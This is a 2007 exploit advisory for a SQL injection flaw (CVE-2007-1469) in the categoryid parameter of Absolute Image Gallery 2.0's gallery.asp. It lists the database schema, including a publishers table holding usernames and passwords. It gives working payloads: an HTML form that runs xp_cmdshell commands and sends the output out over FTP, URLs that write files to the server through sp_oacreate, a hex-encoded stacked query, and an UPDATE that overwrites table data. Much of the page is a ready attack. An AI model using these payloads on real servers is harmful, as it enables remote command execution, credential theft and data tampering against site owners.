Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

2007.03.20
Credit: UniquE-Key
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-1469
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit Type : SQL Injection Release Date : {2007-03-15} Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj- ------------------------------------------------------------------------ --------------------------------------------------------------------- Script Table/Colon Name : ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : articlefiles fileid filetitle filename articleid filetype filecomment urlfile ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : articles articleid posted lastupdate headline headlinedate startdate enddate source summary articleurl article status autoformat publisherid clicks editor relatedid ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : iArticlesZones articleid zoneid ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : plugins pluginid pplname pplfile ppldescription ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : PPL1reviews reviewid articleid name reviewdate review comments isannonymous ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : publishers publisherid name username password email additional plevel ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : publisherszones publisherid zoneid ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : xlaAIGcategories categoryid catname catdesc supercatid lastupdate catpath images allowupload ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : xlaAIGimages imageid imagename imagedesc imagefile imagedate imagesize totalrating totalreviews hits categoryid status uploadedby additionalinfo embedhtml keywords copyright credit source datecreated email infourl ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : xlaAIGpostcards dateposted postcardid imageid bgcolor bordercolor fonttype fontcolor recipientname recipientemail greeting bgsound sendername senderemail sendermsg ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : zones zonename description template articlespz zonefont fontsize fontcolor showsource showsummary showdates showtn textalign displayhoriz cellcolor targetframe ------------------------------------------------------------------------ --------------------------------------------------------------------- MSSQL CMD Injection Exploit(For DBO Users) : <title>Absolute Image Gallery MSSQL CMD Injection Exploit</title> <body bgcolor="#000000"> <form name="Form" method="get" action="http://localhost/script/gallery.asp"> <center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center> <center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center> <center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center> <tr> <center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br> <center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td> <td> </td> <td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c: > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+ *+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td> </tr> <tr> <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td> <td> </td> <td> <select name=""> <option value="0">(CMD)</option> </select> <br><br> <input type="submit" value="Apply"></center> </td> </tr> </table> </form> <center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>UniquE (at) UniquE-Key (dot) ORG [email concealed]</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center> ------------------------------------------------------------------------ --------------------------------------------------------------------- Code Injection(For DBO Users) : Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Creat e+table+code+(txt+varchar(8000),id+int);-- ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;decla re+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F3737372874 78742C6964292076616C7565732827272C3129+exec(@q);-- Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;decla re+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id +=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripti ng.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+o ut,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;-- ------------------------------------------------------------------------ --------------------------------------------------------------------- UPDATE(ALL users) : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';-- ------------------------------------------------------------------------ --------------------------------------------------------------------- Tested : Absolute Image Gallery 2.0 Vulnerable : Absolute Image Gallery 2.0 Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top